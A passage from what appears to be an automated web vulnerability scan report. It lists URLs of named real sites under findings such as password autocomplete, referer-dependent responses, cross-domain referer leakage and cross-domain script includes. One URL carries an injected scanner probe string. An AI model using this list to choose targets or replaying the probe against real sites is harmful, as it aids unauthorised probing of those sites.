17.142. http://r2.mail.ru/b12526191.gif
17.143. http://r2.mail.ru/b12526192.gif
17.144. http://r2.mail.ru/b12526193.gif
17.145. http://r2.mail.ru/b12526194.gif
17.146. http://r2.mail.ru/b12526208.gif
17.147. http://r2.mail.ru/b12526210.gif
17.148. http://r2.mail.ru/b12527647.gif
17.149. http://r2.mail.ru/b12529050.jpg
17.150. http://r2.mail.ru/b12530142.jpg
17.151. http://r2.mail.ru/b12530159.jpg
17.152. http://r2.mail.ru/b12531249.jpg
17.153. http://r2.mail.ru/b12531545.jpg
17.154. http://r2.mail.ru/b12531624.jpg
17.155. http://r2.mail.ru/b12532203.jpg
17.156. http://r2.mail.ru/b12752186.jpg
17.157. http://r2.mail.ru/b12752583.jpg
17.158. http://r2.mail.ru/b12752584.jpg
17.159. http://r2.mail.ru/b12752585.jpg
17.160. http://r2.mail.ru/b12752586.jpg
17.161. http://r2.mail.ru/b12855502.png
17.162. http://r2.mail.ru/b12887675.jpg
17.163. http://r2.mail.ru/b12887676.jpg
17.164. http://r2.mail.ru/b12887677.jpg
17.165. http://r2.mail.ru/b12961140.jpg
17.166. http://r2.mail.ru/b12961154.jpg
17.167. http://r2.mail.ru/b12961373.jpg
17.168. http://r2.mail.ru/b12962356.jpg
17.169. http://r2.mail.ru/b12963308.jpg
17.170. http://r2.mail.ru/b12965362.jpg
17.171. http://r2.mail.ru/b12968616.jpg
17.172. http://r2.mail.ru/b12979027.jpg
17.173. http://r2.mail.ru/b13039712.jpg
17.174. http://r2.mail.ru/b13044176.jpg
17.175. http://r2.mail.ru/b13049054.jpg
17.176. http://r2.mail.ru/b13050852.jpg
17.177. http://r2.mail.ru/b13057590.swf
17.178. http://r2.mail.ru/b13058787.jpg
17.179. http://r2.mail.ru/b13058840.jpg
17.180. http://r2.mail.ru/b13058851.jpg
17.181. http://r2.mail.ru/b13058852.jpg
17.182. http://r2.mail.ru/b13058968.jpg
17.183. http://r2.mail.ru/b13059223.jpg
17.184. http://r2.mail.ru/b13059860.jpg
17.185. http://r2.mail.ru/b13060405.jpg
17.186. http://r2.mail.ru/b13060487.jpg
17.187. http://r2.mail.ru/b13061099.jpg
17.188. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif
17.189. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif
17.190. http://segment-pixel.invitemedia.com/pixel
17.191. http://server.iad.liveperson.net/hc/48536788/
17.192. http://server.iad.liveperson.net/hc/48536788/
17.193. http://server.iad.liveperson.net/hc/48536788/
17.194. http://shopping.netsuite.com/s.nl
17.195. http://show.multiclick.ru/blank.php
17.196. http://sorry.google.com/sorry/
17.197. http://stats.kroogy.com/cnt-gif1x1.php
17.198. http://storage.trafic.ro/js/trafic.js
17.199. https://support.comodo.com/index.php
17.200. https://support.comodo.com/index.php
17.201. http://support.trust-guard.com/index.php
17.202. https://support.trust-guard.com/index.php
17.203. https://support.trust-guard.com/visitor/
17.204. http://t2.trackalyzer.com/trackalyze.asp
17.205. http://top5.mail.ru/counter
17.206. http://translate.googleapis.com/translate_a/t
17.207. http://vkontakte.ru/login.php
17.208. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif
17.209. http://www.dmca.com/Protection/Status.aspx
17.210. http://www.eset.com/us/
17.211. https://www.fusionvm.com/FusionVM/
17.212. http://www.gartner.com/0_admin/css/documentdisplay.css
17.213. http://www.gartner.com/0_admin/css/docverterNGRA.css
17.214. http://www.gartner.com/0_admin/images/documentdisplay/blue_gt_bullet.gif
17.215. http://www.gartner.com/0_admin/images/documentdisplay/blue_v_bullet.gif
17.216. http://www.gartner.com/0_admin/images/documentdisplay/dl_pdf.gif
17.217. http://www.gartner.com/0_admin/images/documentdisplay/gartner_logo.gif
17.218. http://www.gartner.com/0_admin/images/documentdisplay/gray_gt_bullet.gif
17.219. http://www.gartner.com/0_admin/images/documentdisplay/research_logo.gif
17.220. http://www.gartner.com/DisplayDocument
17.221. http://www.gartner.com/images/x.gif
17.222. http://www.gartner.com/js/utility.js
17.223. http://www.gartner.com/js/webtrendsCookies.js
17.224. http://www.googleadservices.com/pagead/conversion/1069716420/
17.225. http://www.googleadservices.com/pagead/conversion/1072501689/
17.226. http://www.kayako.com/
17.227. http://www.kayako.com/styles/
17.228. http://www.kayako.com/styles/graphics/loader.white.gif
17.229. http://www.kronos.com/
17.230. http://www.livejournal.com/tools/endpoints/journalspotlight.bml
17.231. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T
17.232. http://www.smpone.com/
17.233. http://www.smpone.com/404.php
17.234. http://www.smpone.com/News-more-79.html
17.235. http://www.smpone.com/News-more-80.html
17.236. http://www.smpone.com/News.html
17.237. http://www.smpone.com/Sections-read-10.html
17.238. http://www.smpone.com/Sections-read-125.html
17.239. http://www.smpone.com/Sections-read-126.html
17.240. http://www.smpone.com/Sections-read-16.html
17.241. http://www.smpone.com/Sections-read-20.html
17.242. http://www.smpone.com/Sections-read-21.html
17.243. http://www.smpone.com/Sections-read-29.html
17.244. http://www.smpone.com/Sections-read-3.html
17.245. http://www.smpone.com/Sections-read-30.html
17.246. http://www.smpone.com/Sections-read-7.html
17.247. http://www.smpone.com/Static-contact.html
17.248. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
17.249. http://www.tresware.com/
17.250. http://www.tresware.com/CustomPHPProgrammingNJ.html
17.251. http://www.tresware.com/Static-contact.html
17.252. http://www.tresware.com/webcontentmanagementNJ.html
18. Password field with autocomplete enabled
18.1. https://checkout.netsuite.com/s.nl
18.2. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f
18.3. https://customer.kronos.com/
18.4. https://customer.kronos.com/Default.asp
18.5. https://customer.kronos.com/user/logindenied.asp
18.6. http://demo.kayako.com/supportsuite/index.php
18.7. http://direct.yandex.ru/
18.8. http://direct.yandex.ru/pages/direct/_direct-1303387947.js
18.9. https://hourly.deploy.com/hmc/report/
18.10. https://hourly.deploy.com/hmc/report/
18.11. https://hourly.deploy.com/hmc/report/
18.12. https://hourly.deploy.com/hmc/report/
18.13. https://hourly.deploy.com/hmc/report/
18.14. https://hourly.deploy.com/hmc/report/
18.15. https://hourly.deploy.com/hmc/report/
18.16. https://hourly.deploy.com/hmc/report/
18.17. https://hourly.deploy.com/hmc/report/
18.18. https://hourly.deploy.com/hmc/report/
18.19. https://hourly.deploy.com/hmc/report/
18.20. https://hourly.deploy.com/hmc/report/
18.21. https://hourly.deploy.com/hmc/report/
18.22. https://hourly.deploy.com/hmc/report/
18.23. https://hourly.deploy.com/hmc/report/
18.24. https://hourly.deploy.com/hmc/report/
18.25. https://hourly.deploy.com/hmc/report/
18.26. https://hourly.deploy.com/hmc/report/
18.27. https://hourly.deploy.com/hmc/report/
18.28. https://hourly.deploy.com/hmc/report/
18.29. https://hourly.deploy.com/hmc/report/
18.30. https://hourly.deploy.com/hmc/report/
18.31. https://hourly.deploy.com/hmc/report/
18.32. https://hourly.deploy.com/hmc/report/
18.33. https://hourly.deploy.com/hmc/report/
18.34. https://hourly.deploy.com/hmc/report/
18.35. https://hourly.deploy.com/hmc/report/
18.36. https://hourly.deploy.com/hmc/report/
18.37. https://hourly.deploy.com/hmc/report/
18.38. https://hourly.deploy.com/hmc/report/
18.39. https://hourly.deploy.com/hmc/report/
18.40. https://hourly.deploy.com/hmc/report/
18.41. https://hourly.deploy.com/hmc/report/
18.42. https://hourly.deploy.com/hmc/report/
18.43. https://hourly.deploy.com/hmc/report/
18.44. https://hourly.deploy.com/hmc/report/
18.45. https://hourly.deploy.com/hmc/report/
18.46. https://hourly.deploy.com/hmc/report/
18.47. https://hourly.deploy.com/hmc/report/
18.48. https://hourly.deploy.com/hmc/report/
18.49. https://hourly.deploy.com/hmc/report/
18.50. https://hourly.deploy.com/hmc/report/
18.51. https://hourly.deploy.com/hmc/report/
18.52. https://hourly.deploy.com/hmc/report/
18.53. https://hourly.deploy.com/hmc/report/
18.54. https://hourly.deploy.com/hmc/report/
18.55. https://hourly.deploy.com/hmc/report/
18.56. https://hourly.deploy.com/hmc/report/
18.57. https://hourly.deploy.com/hmc/report/
18.58. https://hourly.deploy.com/hmc/report/
18.59. https://hourly.deploy.com/hmc/report/
18.60. https://hourly.deploy.com/hmc/report/
18.61. https://hourly.deploy.com/hmc/report/
18.62. https://hourly.deploy.com/hmc/report/
18.63. https://hourly.deploy.com/hmc/report/
18.64. https://hourly.deploy.com/hmc/report/
18.65. https://hourly.deploy.com/hmc/report/
18.66. https://hourly.deploy.com/hmc/report/
18.67. https://hourly.deploy.com/hmc/report/
18.68. https://hourly.deploy.com/hmc/report/
18.69. https://hourly.deploy.com/hmc/report/
18.70. https://hourly.deploy.com/hmc/report/
18.71. https://hourly.deploy.com/hmc/report/
18.72. https://hourly.deploy.com/hmc/report/
18.73. https://hourly.deploy.com/hmc/report/
18.74. https://hourly.deploy.com/hmc/report/
18.75. https://hourly.deploy.com/hmc/report/
18.76. https://hourly.deploy.com/hmc/report/
18.77. https://hourly.deploy.com/hmc/report/
18.78. https://hourly.deploy.com/hmc/report/
18.79. https://hourly.deploy.com/hmc/report/
18.80. https://hourly.deploy.com/hmc/report/
18.81. https://hourly.deploy.com/hmc/report/
18.82. https://hourly.deploy.com/hmc/report/
18.83. https://hourly.deploy.com/hmc/report/
18.84. https://hourly.deploy.com/hmc/report/
18.85. https://hourly.deploy.com/hmc/report/
18.86. https://hourly.deploy.com/hmc/report/
18.87. https://hourly.deploy.com/hmc/report/
18.88. https://hourly.deploy.com/hmc/report/
18.89. https://hourly.deploy.com/hmc/report/
18.90. https://hourly.deploy.com/hmc/report/
18.91. https://hourly.deploy.com/hmc/report/
18.92. https://hourly.deploy.com/hmc/report/
18.93. https://hourly.deploy.com/hmc/report/
18.94. https://hourly.deploy.com/hmc/report/
18.95. https://hourly.deploy.com/hmc/report/
18.96. https://hourly.deploy.com/hmc/report/
18.97. https://hourly.deploy.com/hmc/report/
18.98. https://hourly.deploy.com/hmc/report/
18.99. https://hourly.deploy.com/hmc/report/
18.100. https://hourly.deploy.com/hmc/report/
18.101. https://hourly.deploy.com/hmc/report/
18.102. https://hourly.deploy.com/hmc/report/
18.103. https://hourly.deploy.com/hmc/report/
18.104. https://hourly.deploy.com/hmc/report/
18.105. https://hourly.deploy.com/hmc/report/
18.106. https://hourly.deploy.com/hmc/report/
18.107. https://hourly.deploy.com/hmc/report/
18.108. https://hourly.deploy.com/hmc/report/
18.109. https://hourly.deploy.com/hmc/report/
18.110. https://hourly.deploy.com/hmc/report/
18.111. https://hourly.deploy.com/hmc/report/
18.112. https://hourly.deploy.com/hmc/report/
18.113. https://hourly.deploy.com/hmc/report/
18.114. https://hourly.deploy.com/hmc/report/
18.115. https://hourly.deploy.com/hmc/report/
18.116. https://hourly.deploy.com/hmc/report/
18.117. https://hourly.deploy.com/hmc/report/
18.118. https://hourly.deploy.com/hmc/report/
18.119. https://hourly.deploy.com/hmc/report/
18.120. https://hourly.deploy.com/hmc/report/
18.121. https://hourly.deploy.com/hmc/report/
18.122. https://hourly.deploy.com/hmc/report/
18.123. https://hourly.deploy.com/hmc/report/
18.124. https://hourly.deploy.com/hmc/report/
18.125. https://hourly.deploy.com/hmc/report/
18.126. https://hourly.deploy.com/hmc/report/
18.127. https://hourly.deploy.com/hmc/report/
18.128. https://hourly.deploy.com/hmc/report/
18.129. https://hourly.deploy.com/hmc/report/
18.130. https://hourly.deploy.com/hmc/report/
18.131. https://hourly.deploy.com/hmc/report/
18.132. https://hourly.deploy.com/hmc/report/
18.133. https://hourly.deploy.com/hmc/report/
18.134. https://hourly.deploy.com/hmc/report/
18.135. https://hourly.deploy.com/hmc/report/
18.136. https://hourly.deploy.com/hmc/report/
18.137. https://hourly.deploy.com/hmc/report/
18.138. https://hourly.deploy.com/hmc/report/
18.139. https://hourly.deploy.com/hmc/report/
18.140. https://hourly.deploy.com/hmc/report/
18.141. https://hourly.deploy.com/hmc/report/
18.142. https://hourly.deploy.com/hmc/report/
18.143. https://hourly.deploy.com/hmc/report/
18.144. https://hourly.deploy.com/hmc/report/
18.145. https://hourly.deploy.com/hmc/report/
18.146. https://hourly.deploy.com/hmc/report/index.cfm
18.147. https://hourly.deploy.com/hmc/report/index.cfm
18.148. https://hourly.deploy.com/hmc/report/index.cfm
18.149. https://hourly.deploy.com/hmc/report/index.cfm
18.150. https://hourly.deploy.com/hmc/report/index.cfm
18.151. https://hourly.deploy.com/hmc/report/index.cfm
18.152. https://hourly.deploy.com/hmc/report/index.cfm
18.153. https://hourly.deploy.com/hmc/report/index.cfm
18.154. https://hourly.deploy.com/hmc/report/index.cfm
18.155. https://hourly.deploy.com/hmc/report/index.cfm
18.156. https://hourly.deploy.com/hmc/report/index.cfm
18.157. https://hourly.deploy.com/hmc/report/index.cfm
18.158. https://hourly.deploy.com/hmc/report/index.cfm
18.159. https://hourly.deploy.com/hmc/report/index.cfm
18.160. https://hourly.deploy.com/hmc/report/index.cfm
18.161. https://hourly.deploy.com/hmc/report/index.cfm
18.162. https://hourly.deploy.com/hmc/report/index.cfm
18.163. https://hourly.deploy.com/hmc/report/index.cfm
18.164. https://hourly.deploy.com/hmc/report/index.cfm
18.165. https://hourly.deploy.com/hmc/report/index.cfm
18.166. https://hourly.deploy.com/hmc/report/index.cfm
18.167. https://hourly.deploy.com/hmc/report/index.cfm
18.168. https://hourly.deploy.com/hmc/report/index.cfm
18.169. https://hourly.deploy.com/hmc/report/index.cfm
18.170. https://hourly.deploy.com/hmc/report/index.cfm
18.171. https://hourly.deploy.com/hmc/report/index.cfm
18.172. https://hourly.deploy.com/hmc/report/index.cfm
18.173. https://hourly.deploy.com/hmc/report/index.cfm
18.174. https://hourly.deploy.com/hmc/report/index.cfm
18.175. https://hourly.deploy.com/hmc/report/index.cfm
18.176. https://hourly.deploy.com/hmc/report/index.cfm
18.177. https://hourly.deploy.com/hmc/report/index.cfm
18.178. https://hourly.deploy.com/hmc/report/index.cfm
18.179. https://hourly.deploy.com/hmc/report/index.cfm
18.180. https://hourly.deploy.com/hmc/report/index.cfm
18.181. https://hourly.deploy.com/hmc/report/index.cfm
18.182. https://hourly.deploy.com/hmc/report/index.cfm
18.183. https://hourly.deploy.com/hmc/report/index.cfm
18.184. https://hourly.deploy.com/hmc/report/index.cfm
18.185. https://hourly.deploy.com/hmc/report/index.cfm
18.186. https://hourly.deploy.com/hmc/report/index.cfm
18.187. https://hourly.deploy.com/hmc/report/index.cfm
18.188. https://hourly.deploy.com/hmc/report/index.cfm
18.189. https://hourly.deploy.com/hmc/report/index.cfm
18.190. https://hourly.deploy.com/hmc/report/index.cfm
18.191. https://hourly.deploy.com/hmc/report/index.cfm
18.192. https://hourly.deploy.com/hmc/report/index.cfm
18.193. https://hourly.deploy.com/hmc/report/index.cfm
18.194. https://hourly.deploy.com/hmc/report/index.cfm
18.195. https://hourly.deploy.com/hmc/report/index.cfm
18.196. https://hourly.deploy.com/hmc/report/index.cfm
18.197. https://hourly.deploy.com/hmc/report/index.cfm
18.198. https://hourly.deploy.com/hmc/report/index.cfm
18.199. https://hourly.deploy.com/hmc/report/index.cfm
18.200. https://hourly.deploy.com/hmc/report/index.cfm
18.201. https://hourly.deploy.com/hmc/report/index.cfm
18.202. https://hourly.deploy.com/hmc/report/index.cfm
18.203. https://hourly.deploy.com/hmc/report/index.cfm
18.204. https://hourly.deploy.com/hmc/report/index.cfm
18.205. https://hourly.deploy.com/hmc/report/index.cfm
18.206. https://hourly.deploy.com/hmc/report/index.cfm
18.207. https://hourly.deploy.com/hmc/report/index.cfm
18.208. https://hourly.deploy.com/hmc/report/index.cfm
18.209. https://hourly.deploy.com/hmc/report/index.cfm
18.210. https://hourly.deploy.com/hmc/report/index.cfm
18.211. https://hourly.deploy.com/hmc/report/index.cfm
18.212. https://hourly.deploy.com/hmc/report/index.cfm
18.213. https://hourly.deploy.com/hmc/report/index.cfm
18.214. https://hourly.deploy.com/hmc/report/index.cfm
18.215. https://hourly.deploy.com/hmc/report/index.cfm
18.216. https://hourly.deploy.com/hmc/report/index.cfm
18.217. https://hourly.deploy.com/hmc/report/index.cfm
18.218. https://hourly.deploy.com/hmc/report/index.cfm
18.219. https://hourly.deploy.com/hmc/report/index.cfm
18.220. https://hourly.deploy.com/hmc/report/index.cfm
18.221. https://hourly.deploy.com/hmc/report/index.cfm
18.222. https://hourly.deploy.com/hmc/report/index.cfm
18.223. https://hourly.deploy.com/hmc/report/index.cfm
18.224. https://hourly.deploy.com/hmc/report/index.cfm
18.225. https://hourly.deploy.com/hmc/report/index.cfm
18.226. https://hourly.deploy.com/hmc/report/index.cfm
18.227. https://hourly.deploy.com/hmc/report/index.cfm
18.228. https://hourly.deploy.com/hmc/report/index.cfm
18.229. https://hourly.deploy.com/hmc/report/index.cfm
18.230. https://hourly.deploy.com/hmc/report/index.cfm
18.231. https://hourly.deploy.com/hmc/report/index.cfm
18.232. https://hourly.deploy.com/hmc/report/index.cfm
18.233. https://hourly.deploy.com/hmc/report/index.cfm
18.234. https://hourly.deploy.com/hmc/report/index.cfm
18.235. https://hourly.deploy.com/hmc/report/index.cfm
18.236. https://hourly.deploy.com/hmc/report/index.cfm
18.237. https://hourly.deploy.com/hmc/report/index.cfm
18.238. https://hourly.deploy.com/hmc/report/index.cfm
18.239. https://hourly.deploy.com/hmc/report/index.cfm
18.240. https://hourly.deploy.com/hmc/report/index.cfm
18.241. https://hourly.deploy.com/hmc/report/index.cfm
18.242. https://hourly.deploy.com/hmc/report/index.cfm
18.243. https://hourly.deploy.com/hmc/report/index.cfm
18.244. https://hourly.deploy.com/hmc/report/index.cfm
18.245. https://hourly.deploy.com/hmc/report/index.cfm
18.246. https://hourly.deploy.com/hmc/report/index.cfm
18.247. https://hourly.deploy.com/hmc/report/index.cfm
18.248. https://hourly.deploy.com/hmc/report/index.cfm
18.249. https://hourly.deploy.com/hmc/report/index.cfm
18.250. https://hourly.deploy.com/hmc/report/index.cfm
18.251. https://hourly.deploy.com/hmc/report/index.cfm
18.252. https://hourly.deploy.com/hmc/report/index.cfm
18.253. https://hourly.deploy.com/hmc/report/index.cfm
18.254. https://hourly.deploy.com/hmc/report/index.cfm
18.255. https://hourly.deploy.com/hmc/report/index.cfm
18.256. https://hourly.deploy.com/hmc/report/index.cfm
18.257. https://hourly.deploy.com/hmc/report/index.cfm
18.258. https://hourly.deploy.com/hmc/report/index.cfm
18.259. https://hourly.deploy.com/hmc/report/index.cfm
18.260. https://hourly.deploy.com/hmc/report/index.cfm
18.261. https://hourly.deploy.com/hmc/report/index.cfm
18.262. https://hourly.deploy.com/hmc/report/index.cfm
18.263. https://hourly.deploy.com/hmc/report/index.cfm
18.264. https://hourly.deploy.com/hmc/report/index.cfm
18.265. https://hourly.deploy.com/hmc/report/index.cfm
18.266. https://hourly.deploy.com/hmc/report/index.cfm
18.267. https://hourly.deploy.com/hmc/report/index.cfm
18.268. https://hourly.deploy.com/hmc/report/index.cfm
18.269. https://hourly.deploy.com/hmc/report/index.cfm
18.270. https://hourly.deploy.com/hmc/report/index.cfm
18.271. https://hourly.deploy.com/hmc/report/index.cfm
18.272. https://hourly.deploy.com/hmc/report/index.cfm
18.273. https://hourly.deploy.com/hmc/report/index.cfm
18.274. https://hourly.deploy.com/hmc/report/index.cfm
18.275. https://hourly.deploy.com/hmc/report/index.cfm
18.276. https://hourly.deploy.com/hmc/report/index.cfm
18.277. https://hourly.deploy.com/hmc/report/index.cfm
18.278. https://hourly.deploy.com/hmc/report/index.cfm
18.279. https://hourly.deploy.com/hmc/report/index.cfm
18.280. https://hourly.deploy.com/hmc/report/index.cfm
18.281. https://hourly.deploy.com/hmc/report/index.cfm
18.282. https://hourly.deploy.com/hmc/report/index.cfm
18.283. https://hourly.deploy.com/hmc/report/index.cfm
18.284. https://hourly.deploy.com/hmc/report/index.cfm
18.285. https://hourly.deploy.com/hmc/report/index.cfm
18.286. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)
18.289. http://my.webalta.ru/public/engine/templates.js
18.290. http://my.webalta.ru/public/engine/templates.js
18.291. http://odnoklassniki.ru/
18.292. http://pda.loveplanet.ru/
18.294. https://secure.trust-guard.com/
18.295. https://secure.trust-guard.com/index.php
18.296. https://support.comodo.com/
18.297. https://support.comodo.com/index.php
18.298. http://support.trust-guard.com/
18.299. http://support.trust-guard.com/index.php
18.300. https://support.trust-guard.com/
18.301. https://support.trust-guard.com/index.php
18.302. https://system.netsuite.com/pages/customerlogin.jsp
18.304. http://www.integritydefender.com/account.php
18.305. http://www.livejournal.com/
18.306. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
18.307. http://www.ripoffreport.com/LoginPage.aspx
19.1. https://hourly.deploy.com/hmc/report/index.cfm
19.2. http://l-files.livejournal.net/userapps/10/image
19.3. http://www.elineaccessories.com/static/js/int/public/jquery.iv.js
19.4. http://www.netsuite.com/portal/javascript/NLPortal.js
20.1. http://counter.hitslink.com/Default.aspx
20.2. http://ideco-software.ru/Default.aspx
21. Referer-dependent response
21.1. http://pixel.fetchback.com/serve/fb/pdc
21.2. http://solutions.kronos.com/content/experience2011
21.3. https://support.trust-guard.com/index.php%253f_ca=css&group=default
21.4. https://support.trust-guard.com/index.php%3f_ca=css&group=default
21.5. https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)
21.6. https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)%3b
21.7. http://www.dmca.com/Protection/Status.aspx
21.9. http://www.eset.com/us/business/products
21.10. http://www.eset.com/us/business/server-security/linux-file
21.11. http://www.eset.com/us/home/smart-security
21.12. http://www.eset.com/us/store
21.13. http://www.facebook.com/plugins/like.php
22.1. http://direct.yandex.ru/
22.2. http://nguard.com/contact.aspx
22.3. http://nguard.com/security/contact.aspx
22.4. http://odnoklassniki.ru/
22.5. http://www.customermagnetism.com/
22.6. http://www.customermagnetism.com/case-studies/
22.7. http://www.customermagnetism.com/free-consultation/
22.8. http://www.customermagnetism.com/pay-per-click-services/
22.9. http://www.customermagnetism.com/seo-faq/
22.10. http://www.eset.com/us/home/smart-security
22.11. http://www.eset.com/us/store
22.12. http://www.eset.com/us/store
22.13. http://www.eset.com/us/store
22.14. http://www.eset.com/us/store
22.15. http://www.eset.com/us/store
22.16. http://www.eset.com/us/store
22.17. http://www.integritydefender.com/buyerDetails.php
22.18. http://www.removeyourname.com/company/contact.html
22.19. http://www.reputationchanger.com/
23. Cross-domain Referer leakage
23.1. http://ad.amgdgt.com/ads/
23.2. http://ad.amgdgt.com/ads/
23.3. http://an.yandex.ru/code/57617
23.4. http://an.yandex.ru/code/57617
23.5. http://an.yandex.ru/code/57617
23.6. http://an.yandex.ru/code/66894
23.7. https://checkout.netsuite.com/s.nl
23.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f
23.9. http://direct.yandex.ru/
23.11. http://foreign.dt00.net/zones/zone25.php
23.12. http://forums.manageengine.com/fbw
23.13. http://googleads.g.doubleclick.net/pagead/ads
23.14. http://googleads.g.doubleclick.net/pagead/ads
23.15. http://googleads.g.doubleclick.net/pagead/ads
23.16. http://googleads.g.doubleclick.net/pagead/ads
23.17. http://googleads.g.doubleclick.net/pagead/ads
23.18. http://googleads.g.doubleclick.net/pagead/ads
23.19. http://googleads.g.doubleclick.net/pagead/ads
23.20. http://googleads.g.doubleclick.net/pagead/ads
23.21. http://googleads.g.doubleclick.net/pagead/ads
23.22. http://googleads.g.doubleclick.net/pagead/ads
23.23. http://googleads.g.doubleclick.net/pagead/ads
23.24. http://googleads.g.doubleclick.net/pagead/ads
23.25. http://googleads.g.doubleclick.net/pagead/ads
23.26. http://googleads.g.doubleclick.net/pagead/ads
23.27. http://googleads.g.doubleclick.net/pagead/ads
23.28. http://googleads.g.doubleclick.net/pagead/ads
23.29. http://googleads.g.doubleclick.net/pagead/ads
23.30. http://googleads.g.doubleclick.net/pagead/ads
23.31. http://googleads.g.doubleclick.net/pagead/ads
23.32. http://googleads.g.doubleclick.net/pagead/ads
23.33. http://googleads.g.doubleclick.net/pagead/ads
23.34. http://googleads.g.doubleclick.net/pagead/ads
23.35. http://googleads.g.doubleclick.net/pagead/ads
23.36. http://googleads.g.doubleclick.net/pagead/ads
23.37. http://googleads.g.doubleclick.net/pagead/ads
23.38. http://googleads.g.doubleclick.net/pagead/ads
23.39. http://googleads.g.doubleclick.net/pagead/ads
23.40. http://googleads.g.doubleclick.net/pagead/ads
23.41. http://googleads.g.doubleclick.net/pagead/ads
23.42. http://googleads.g.doubleclick.net/pagead/ads
23.43. http://googleads.g.doubleclick.net/pagead/ads
23.44. http://googleads.g.doubleclick.net/pagead/ads
23.45. http://googleads.g.doubleclick.net/pagead/ads
23.46. http://googleads.g.doubleclick.net/pagead/ads
23.47. http://googleads.g.doubleclick.net/pagead/ads
23.48. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/
23.51. http://ideco-software.ru/products/ims/
23.52. http://ioerror.us/bb2-support-key
23.53. http://js.dt00.net/public/smi/elastic/24.js
23.54. http://jsc.dt00.net/w/e/webalta.ru.1001.js
23.55. http://jsc.dt00.net/w/e/webalta.ru.1668.js
23.56. http://jsg.dt00.net/m/a/marketgid.com.i5.js
23.57. http://jsg.dt00.net/m/a/marketgid.com.i59.js
23.58. http://learn.shavlik.com/shavlik/index.cfm
23.59. http://learn.shavlik.com/shavlik/index.cfm
23.60. http://limg.imgsmail.ru/r/js/splash.js
23.61. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
23.62. http://nguard.com/vulnerability-assessment/
23.63. http://pixel.fetchback.com/serve/fb/pdc
23.64. http://playaudiomessage.com/play.asp
23.65. http://playaudiomessage.com/play.asp
23.66. http://playaudiomessage.com/play.asp
23.67. http://player.vimeo.com/video/22043447
23.68. http://shopping.netsuite.com/s.nl
23.69. http://storage.trafic.ro/js/trafic.js
23.70. http://support.trust-guard.com/index.php
23.71. http://tengrinews.kz/static/js/twitter.js
23.72. http://tengrinews.kz/tag/891/
23.73. http://webalta.ru/news.html
23.74. https://www.controlscan.com/checkout_invalid.php
23.75. https://www.controlscan.com/shoppingcart.php
23.76. http://www.depthsecurity.com/
23.77. http://www.dmca.com/Protection/Status.aspx
23.78. http://www.eset.com/us/business/products
23.79. http://www.facebook.com/plugins/like.php
23.80. http://www.google.com/search
23.81. http://www.google.com/search
23.82. http://www.google.com/search
23.83. http://www.google.com/search
23.84. http://www.google.com/search
23.85. http://www.google.com/url
23.86. http://www.google.com/url
23.87. http://www.google.com/url
23.88. http://www.googleadservices.com/pagead/conversion/1072501689/
23.89. http://www.integritydefender.com/buyerDetails.php
23.90. http://www.iveco-ptc.spb.ru/
23.91. http://www.manageengine.com/products/security-manager/
23.92. http://www.manageengine.com/products/security-manager/download.html
23.93. http://www.outpost24.com/
23.94. http://www.praetorian.com/external-network-penetration-test.html
23.96. http://www.stillsecure.com/m/
23.97. http://www.trucklist.ru/cars/trucks
24. Cross-domain script include
24.1. http://ad.amgdgt.com/ads/
24.2. http://ad.amgdgt.com/ads/
24.4. https://checkout.netsuite.com/s.nl
24.5. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f
24.6. http://direct.yandex.ru/
24.7. http://forums.manageengine.com/fbw
24.8. http://games.webalta.ru/
24.9. http://goods.adnectar.com/static/quantcast_1.html
24.10. http://googleads.g.doubleclick.net/pagead/ads
24.11. http://googleads.g.doubleclick.net/pagead/ads
24.12. http://googleads.g.doubleclick.net/pagead/ads
24.13. http://hostpapasupport.com/
24.14. http://ideco-software.ru/products/ims/
24.15. http://learn.shavlik.com/
24.16. http://learn.shavlik.com/shavlik/N
24.17. http://learn.shavlik.com/shavlik/a
24.19. http://nguard.com/about.aspx
24.20. http://nguard.com/contact.aspx
24.21. http://nguard.com/vulnerability-assessment/
24.22. http://odnoklassniki.ru/
24.23. http://pda.loveplanet.ru/
24.24. http://pixel.fetchback.com/serve/fb/pdc
24.25. http://player.vimeo.com/video/22043447
24.26. http://pogoda.webalta.ru/
24.28. http://shopping.netsuite.com/s.nl
24.29. http://solutions.kronos.com/forms/experience2011
24.30. https://store.manageengine.com/service-desk/index.html
24.31. http://tengrinews.kz/tag/891/
24.33. http://webalta.ru/news.html
24.34. https://www.controlscan.com/
24.35. https://www.controlscan.com/checkout.php
24.36. https://www.controlscan.com/checkout_invalid.php
24.37. https://www.controlscan.com/pcicompliance.php
24.38. https://www.controlscan.com/shoppingcart.php
24.39. http://www.criticalwatch.com/company/critical-watch-career.aspx
24.40. http://www.criticalwatch.com/company/critical-watch-contact.aspx
24.41. http://www.criticalwatch.com/company/critical-watch-security.aspx
24.42. http://www.criticalwatch.com/company/management.aspx
24.43. http://www.criticalwatch.com/products/mssp.aspx
24.44. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx
24.45. http://www.criticalwatch.com/products/vulnerability-management-overview.aspx
24.46. http://www.criticalwatch.com/solutions/vulnerability-management.aspx
24.47. http://www.criticalwatch.com/support/critical-watch-resource-library.aspx
24.48. http://www.criticalwatch.com/support/critical-watch-support.aspx
24.49. http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx
24.50. http://www.criticalwatch.com/vulnerability-management.aspx
24.51. http://www.criticalwatch.com/vulnerability-scan-trial.aspx
24.52. http://www.customermagnetism.com/
24.53. http://www.customermagnetism.com/case-studies/
24.54. http://www.customermagnetism.com/free-consultation/
24.55. http://www.customermagnetism.com/pay-per-click-services/
24.56. http://www.customermagnetism.com/scripts/prettyPhoto/js/jquery.prettyPhoto.js
24.57. http://www.customermagnetism.com/seo-faq/
24.58. http://www.eset.com/us/
